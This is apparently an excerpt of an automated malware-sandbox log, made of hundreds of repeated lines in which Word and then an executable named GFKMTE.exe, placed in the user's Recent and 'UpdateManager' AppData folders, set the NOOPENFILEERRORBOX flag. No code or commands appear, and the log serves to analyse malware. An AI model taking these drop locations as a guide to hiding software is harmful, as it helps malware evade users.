                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
